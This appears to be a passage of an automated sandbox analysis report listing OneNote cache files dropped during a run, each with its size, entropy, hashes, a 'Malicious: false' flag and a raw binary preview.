SSDEEP:	96:XEll+Xs/9TGcUcCLCh9zEqDej6zEYEG4IR1EzPWc4IGouQWpH4If+x:0X5RFCIgqJgFO0jWUGzQ8X
MD5:	285CE56CE912BB93621A538AB9FAB77B
SHA1:	174C1D5022AA1CDC59CEC2515E14F18BCC04B260
SHA-256:	5B82A28089DD2E8B6260EC8027C6D2FBA2D0846A23D26D25DE7F059D3EEDCB0A
SHA-512:	13A94E3FA4CAF2AF1CEEFA04D874A292C002949A323E8FDA9B53913F0AC52F335AB64FE76C48F181C048A7AA6AD7387817309AA3647DC334A45766C059D9F005
Malicious:	false
Preview:	\...,................................................................................................?..................................................\...,...............<......................................t..G..........=.......=.....5pa..r...#nF.T..!..m...o.#n.Xa....@.+D.z..P.Xa....=.....5pa..r....=............=.......=................................................A.I.....A.I...5N.3~.k..>i.k.....i.k...@.P..\1e.2...P...^...@.........................=.A.I.iVz.=~.................T).....=.......=X......=..G....=.......=..".....T)...D..T.v......X.......iVz..c..,0...e...B4.$...........GP..A..}.....J....................=~......=~.V..J..cX..1CX.......X..\.~0@.yT..(.....t..G............p...<..-'...0..p...X..\.~0@.yT..(..X.......>.......l.......Xa....@.+D.z..P.u+[oz+M.*`..#..D..Mz..A.tLCK.............0...........e....4.............."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w.......B.^....F...r.QH.....(...........(..."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.580916330911426
Encrypted:	false
SSDEEP:	384:xBJ5plinI6nsRc7uGRt3rN5OKldHme98mQK7miIs6LFjwrKLN/Tudm6NBceQQ65B:xBJ56nI6sG7FRNrN5OKldHme98mQKii0
MD5:	E8665086507A7C2873AC17A996A76156
SHA1:	5A2B533055F7C593FE83F86CBDB671D196594B98
SHA-256:	29009B8D47CCB217A2389AB2A5E6683EA4588B5623765BD6732235EF2FC2CF51
SHA-512:	BD9766393240CB9B2CEDA5F747CA3D037C85B402F14B9A7C1F354840105B051BB1085EBDFA52AA1AF833B410E52F90647BF0044742577A54160DABCC335123C8
Malicious:	false
Preview:	....>...........v.......p@..X ..`J..........>...t...8...v........H..X ..PI..................................................................................>...........v........I..X ...I...............I.......I.qk..B.....LZL.o.....L.o~..V.5.m...T.N.....-.gN._..N...L.o~..V.5.m...TtL.o..I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'...............s......`..u)......N...^...............m.._...I.u..t./l............................................4....I.qk..B.....LZ..............s......`..u)...................................L.o.....L.o.....L.o.........................................L.oj....L.oT.h..L.o..D..L.o..-..L.oH....L.o.....L.o....%L.o..0...............;........4...4...4............'L.oDL.o..z...,4. .......$>........4....7.......................L.o3L.o.L.o.L.o.L.o.L.o.L.o..z...y.. x.. ........ ..$...$........&..$!..7!..7.........*...o.e.L.o.c.I.D...o.e.L.o.c

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.024684364781696
Encrypted:	false
SSDEEP:	96:kxso9dWEfsXB9bkX/Pkf+y3/eHmfrmcBXeluDR/CgytyAZGc:kxso9pkR9IX/8fD/eHAmsXMuDR/CRG
MD5:	D25E0FB5D60D15E387C77C95EBB1BB57
SHA1:	C1EA1D341AF07BD5407972BD816251965B0407FD
SHA-256:	E3F4043816359424A8C23862B5C88FC462082327D9F44FB2599436D9A85F7CC5
SHA-512:	F31D6B43350009DB78BB6BBBDA66C0B893A01D2C34CAB8893FFB06DC07E91E73380FF0B7A9F29EA8739EAACB52154BCB87F4FECD56BECF64C8933CDA3F17F819
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......j...v...6............................I.......I.qk..B.....LZK%..)...K%....G.....%.K.K%....G.....%.K.K%...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'....................9(.K\|).....N...^................\|.. ..I...[..\|_...........@&....................................I.qk..B.....LZ...................9(.K\|)................9(.K\|)..........K%......K%......K%..........................................K%.j....K%.T)Z..K%...2..K%.....K%.H....K%...J.$K%.$.z.%K%..0...............;........4...4...4..............z...........................;...!..7......................C.a.l.i.b.r.i.................z.......R...................!..7............S.y.m.b.o.l...................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.5125815212859575
Encrypted:	false
SSDEEP:	192:40sPUdRWG1lRHmC9M1zB8RvC8yYl1JwzD1jXl9d8uJsRtMzTvN5m:4JiWG1lRHmKM1zi5hEzD1b7db2Rtijm
MD5:	97E614B6EF9B22A6D3C43F32A8598199
SHA1:	09D370030159DD74D726F5FB626B2097713CEE85
SHA-256:	736B8A58CBD0DF2CA560E3CB221EC9E5123EBD5235CCD0DEFDD980AAF1A8CD53
SHA-512:	1A2C65033D7B18113DBE5B2447A5C5595960FABA0C215DB43564A7612D430A5447E94D7F4E52569D667C706B50A90404B5646671221FBCA8982B71F3C1C892AF
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......0...v................................I.......I.qk..B.....LZW..9...W.F.....t..0.E`W.F.....t..0.E`W...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............ip.I..M.9.1.........N...^..................B.k.L.qg;1..g........"...4...............................b....I.qk..B.....LZ............ip.I..M.9.1.............ip.I..M.9.1..............W......W......W..........................................W.j....W.T.x..W......W...4..W.H....W. ....W.$....W...j...............;........4...4...4.............W.:W.jW...z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0...........W.:W.LW...z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.252979000195995
Encrypted:	false
SSDEEP:	384:ZoIBueOar4DP6ugycf/LbRSz4KsxaMwAm:ZoIBu0r4DP6ugzf/LbR44KsxaMwAm
MD5:	363217343EB68A29B3BE41EFB7B840E6
SHA1:	90D29CC2BA3B9590AADF83A0B148E3DEABB57A48
SHA-256:	BD08552F564EDCB001DF606F46E5FB924A9A522FB077ADB824EC139EA5F27BEC
SHA-512:	301FEF02ED67980CCDB331B032A533D9516DE17EE25787572133687842803D4DAF9155E60CF31652481AD762A7F5B0100EB83B58347C20E630235839F4213964
Malicious:	false
Preview:	2...>.......r...v.......p ..X/..2...>.......j...v...6....-..x........LZ............Pw.3.G.H..^./b.........Pw.3.G.H..^./b.....2...>.......r...v........-..x...........v........-..x...................]...T...]...\.e.0dB...X..I.......I.qk..B.....LZ]...\.e.0dB...X.]....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............P...=.. .!.#......N...^...............Pw.3.G.H..^./b.........4...............Pw.3.G.H..^./b..........I.qk..B.....LZ............P...=.. .!.#...................................].......].......]...........................................]..j....]..T)y..].......]....4..]....a..]....l..]..$.N.$]..$.................;........4...4...4............']..%]...]....z...,4. ...........$>........4.@!..7..............................D..n4..o4..p4...4. ..u-...............................;........4...4...4.............].......]......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.7586583788719015
Encrypted:	false
SSDEEP:	192:gsLKixW4Xpb9N95/tctASvzox0reLIic6XwAfSPRt2+ybmL:FdzX59P5/tcnc0reflwKSPRtJy6L
MD5:	44A397B8E4404B123D54F31E46D9E032
SHA1:	7EB6EE2FDEC41150A51A102C3A26C7950B1BB6F4
SHA-256:	3B4A24884D17C28ED4304FB1C7C3711630986277626AE8ACF1683BBFEB34964D
SHA-512:	A23B47FDB75574024E9F597CF3072AB580CA224883D86936D14AF09DF93B977EF4022948554C59A7347277AE0E5D6639E5EDAF82E27C6CAF02DD9138793236B9
Malicious:	false
Preview:	2...>...h.......v........ .. !..2...>...........v.......@................................................................................................................................................I.......I.qk..B.....LZ..n.9.....n.v.N.'..D..>...n.v.N.'..D..>...n..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............\|..Zj..?}S.IG.....N...^.................i.MLvM..Kn................>....................................I.qk..B.....LZ.............\|..Zj..?}S.IG....................................n.......n.......n...........................................nj......nT.~....n.......n..P....nH......n ......n$......n..n...............;........4...4...4...............n:..nj..n..z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0.............n:..nL..n..z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.716170186823829
Encrypted:	false
SSDEEP:	192:oks6iTCTqzfXAf/weXAVXn69ekRtJBp4o69MFCL9Rk7dXQ/rJ0QTD8WlgeAEs:q6i0qzXiDXA6hRtJBp4o+MFC5R/TJ0QA
MD5:	DA037CE1EA72C24CEBA69BBC2DA442DE
SHA1:	9ED0583913D3B85891EB516B385BCB4C5F72BBC2
SHA-256:	D583E1172EACC7E0E966A2C43015931770293424B8697C1BC69BD4442E0472B5
SHA-512:	E0C615F41A1742ECD8076A46CFCC850B37D93A54BB847C22D21EEB3BBBFFF41A2DCD920DB9384996AB579A6235726F01A2CAD7F6BAC4BF4F999777B5409D74E4
Malicious:	false
Preview:	4...>.......^...v...2...@ ...+..4...>...........v...z...@..................................................................................................................................................O........12.2..v...M.I.......I.qk..B.....L......12.2..v...M.....I.qk..B.....LZ.I..=.+uOe8M....4.e.=.+...........I.......I...................................................I.t.....I................................................................4..'...'.............TK.x.k&@..........N...^................~...2O......+........B...Z....................................I.qk..B.....LZ............TK.x.k&@......................................................................................................j.......T.u.......d...............2.......m.....$.#.$...$.........z.......R...................!..7............W.i.n.g.d.i.n.g.s......333..................;........4...4...4................:...L...Y...K.....z...y.. x.. ........ ..$...$........!..7!..7............o.e.L.o.c.I.D...o.e.L

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.591703543138813
Encrypted:	false
SSDEEP:	192:hfpsOBrVgdU3cksUo0wveShhXugQgX0ap/lXpRt48PpoJ6XW4C6uw9vGj169NEQG:hfOQrUU3crUMeeuoh9XpRtjoJ6X5usv0
MD5:	0610CA601F75776031974F4C5C0A07E9
SHA1:	14F57F29C00E90828E54A8E8BD7C17E2D488605B
SHA-256:	D042367F4CBCC5C2675328AE00DE8BB9002F9EC6AC63DBF01938FB5EE156EFD1
SHA-512:	6C418AD6E1641410172415CC57C0A04CFD4C5E00C25693089907E0622DD0F2B0779AFAD19DF9A8718D652ABAA31DB590568F7139D8CA5F69BE2770E2E1DABCFE
Malicious:	false
Preview:	2...>.......<...v.......` ..`+..2...>...........v...X...@...P...........................................................................................................................................I.......I.qk..B.....LZ8d..G...8d...z....Z...zu8d...z....Z...zu8d...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............;1.D{...o........N...^...............:..9..%H.N...%.#............j....................................I.qk..B.....LZ..............;1.D{...o.....................................8d......8d......8d..........................................8d.j....8d.T)z..8d...`..8d......8d...D..8d...a..8d.$.6.$8d.$.................;........4...4...4.............8d.;8d.Y8d.X8d...z...y.. x.. ........ ..$...$........D...E.......!..7!..7............o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9.........$....................z.......R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.619425893291662
Encrypted:	false
SSDEEP:	384:5t7/Iu/Z8qNXNTwLZ0qZPtL5Cxvj9D2kg0xWmQX3f/XtPF1r78ARJB0IL1Pk2IFQ:51/JNMLXJt9ExwtL1P3MN9Olqf3fXe
MD5:	A1913012389FD9FE0D77B41AFD50DE7D
SHA1:	B46A962DC8840548F51447B1A599D035E0B72D38
SHA-256:	3B71AA9951AAAC8BFA73717F101A13FBD09385F88F5FEB08F03EF7B63A29106A
SHA-512:	91C08D9C5AE915CB41A3507265AEE3D53B3B3FB2C6B91FAC08E35B95E4563D621CC5D3CD3AD8AFA728CAFD42EC4304D50DCC0C034921D8102EC9D40DDEFDB3F2
Malicious:	false
Preview:	l...P....&......f%.."&..H....!...@.. `..........l...P....%......f%..>&......!...@.. `..h...............................................................l...P....%......f%......H....!...@.. `..................P..p....DV.r...............rO...s..=..Y......4......@.Y..\. ......v......\. ...=F....:..-..T...=............F.......F....................................................T"......T%...d..T"/.....T%Z...=.T.a..7..T.D..?..T...&..F..............0...........e....4........................~.K$.hcM..~.........(...`E......(...$...B.i.n.o.c.u.l.a.r.s. .C.o.r.n.e.r...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...0...0.0.0.8...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e......................S..&......I......I.G..k.f6...2...........R#......H...6%..h..............d........M....................0...........e....4.........................u.4..G..p.".a.....(...P.u.....(..."...B.l.u.e. .M.i.s.t. .M.a.r.g.i.n...j...P.a.g.e.L.o.c.I.D...L.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.382240034075319
Encrypted:	false
SSDEEP:	48:wsnCINBH5LI2FsYtc0QWE8oAX39CuMczbrdhSrMKtXgZ8T9y5LFp6O45j8YIZI:wscuTCoE8NX39hMaRAXd
MD5:	360A1C5D8899C3418BC93A89DFBC5948
SHA1:	1C9D731CA3396EE2510AE4EDB6818773453BC1D7
SHA-256:	94A558A12CDC32433BA8ED9611B6E20ABCD92A89C78E27890292EBBD63D3B5FE
SHA-512:	7B5B5D7F8A90A961586DF6FF9C844600602C5FCA9DFABAF95BED303CDDA82D35401A1288634BA55BE1E82102F3A1760D33FA69222259473FEEB7C09289F243ED
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.............m..#..o.3c4.....m..#..o.3c4.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............e......).G.S/.....N...^..................!?.,E..G.aOw.........f........................................I.qk..B.....LZ.............e......).G.S/..........e......).G.S/.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
